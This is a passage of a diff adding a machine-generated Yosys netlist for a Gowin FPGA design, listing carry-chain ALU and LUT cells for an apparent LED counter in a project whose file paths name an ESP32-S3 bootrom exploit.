"led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 170 ], + "COUT": [ 168 ], + "I0": [ 27 ], + "I1": [ 61 ], + "I3": [ 27 ], + "SUM": [ 171 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 172 ], + "COUT": [ 170 ], + "I0": [ 27 ], + "I1": [ 64 ], + "I3": [ 27 ], + "SUM": [ 173 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 174 ], + "COUT": [ 172 ], + "I0": [ 28 ], + "I1": [ 67 ], + "I3": [ 27 ], + "SUM": [ 175 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 176 ], + "COUT": [ 174 ], + "I0": [ 27 ], + "I1": [ 70 ], + "I3": [ 27 ], + "SUM": [ 177 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 178 ], + "COUT": [ 176 ], + "I0": [ 28 ], + "I1": [ 73 ], + "I3": [ 27 ], + "SUM": [ 179 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 180 ], + "COUT": [ 178 ], + "I0": [ 27 ], + "I1": [ 76 ], + "I3": [ 27 ], + "SUM": [ 181 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 182 ], + "COUT": [ 180 ], + "I0": [ 27 ], + "I1": [ 83 ], + "I3": [ 27 ], + "SUM": [ 183 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 28 ], + "COUT": [ 182 ], + "I0": [ 27 ], + "I1": [ 86 ], + "I3": [ 27 ], + "SUM": [ 184 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_LUT4_I1": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1010100000001000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 12 ], + "I0": [ 42 ], + "I1": [ 139 ], + "I2": [ 140 ], + "I3": [ 141 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 185 ], + "COUT": [ 140 ], + "I0": [ 27 ], + "I1": [ 44 ], + "I3": [ 27 ], + "SUM": [ 186 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 187 ], + "COUT": [ 185 ], + "I0": [ 27 ], + "I1": [ 46 ], + "I3": [ 27 ], + "SUM": [ 188 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 189 ], + "COUT": [ 187 ], + "I0": [ 27 ], + "I1": [ 81 ], + "I3": [ 27 ], + "SUM": [ 190 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 191 ], + "COUT": [ 189 ], + "I0": [ 27 ], + "I1": [ 96 ], + "I3": [ 27 ], + "SUM": [ 192 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 193 ], + "COUT": [ 191 ], + "I0": [ 27 ], + "I1": [ 99 ], + "I3": [ 27 ], + "SUM": [ 194 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 195 ], + "COUT": [ 193 ], + "I0": [ 27 ], + "I1": [ 102 ], + "I3": [ 27 ], + "SUM": [ 196 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 197 ], + "COUT": [ 195 ], + "I0": [ 27 ], + "I1": [ 105 ], + "I3": [ 27 ], + "SUM": [ 198 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 199 ], + "COUT": [ 197 ], + "I0": [ 27 ], + "I1": [ 108 ], + "I3": [ 27 ], + "SUM": [ 200 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 201 ], + "COUT": [ 199 ], + "I0": [ 27 ], + "I1": [ 111 ], + "I3": [ 27 ], + "SUM": [ 202 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 203 ], + "COUT": [ 201 ], + "I0": [ 27 ], + "I1": [ 114 ], + "I3": [ 27 ], + "SUM": [ 204 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 205 ], + "COUT": [ 203 ], + "I0": [ 27 ], + "I1": [ 48 ], + "I3": [ 27 ], + "SUM": [ 206 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 207 ], + "COUT": [ 205 ], + "I0": [ 27 ], + "I1": [ 52 ], + "I3": [ 27 ], + "SUM": [ 208 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 209 ], + "COUT": [ 207 ], + "I0": [ 27 ], + "I1": [ 55 ], + "I3": [ 27 ], + "SUM": [ 210 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 211 ], + "COUT": [ 209 ], + "I0": [ 27 ], + "I1": [ 58 ], + "I3": [ 27 ], + "SUM": [ 212 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 213 ], + "COUT": [ 211 ], + "I0": [ 27 ], + "I1": [ 61 ], + "I3": [ 27 ], + "SUM": [ 214 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 215 ], + "COUT": [ 213 ], + "I0": [ 27 ], + "I1": [ 64 ], + "I3": [ 27 ], + "SUM": [ 216 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 217 ], + "COUT": [ 215 ], + "I0": [ 27 ], + "I1": [ 67 ], + "I3": [ 27 ], + "SUM": [ 218 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 219 ], + "COUT": [ 217 ], + "I0": [ 28 ], + "I1": [ 70 ], + "I3": [ 27 ], + "SUM": [ 220 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": 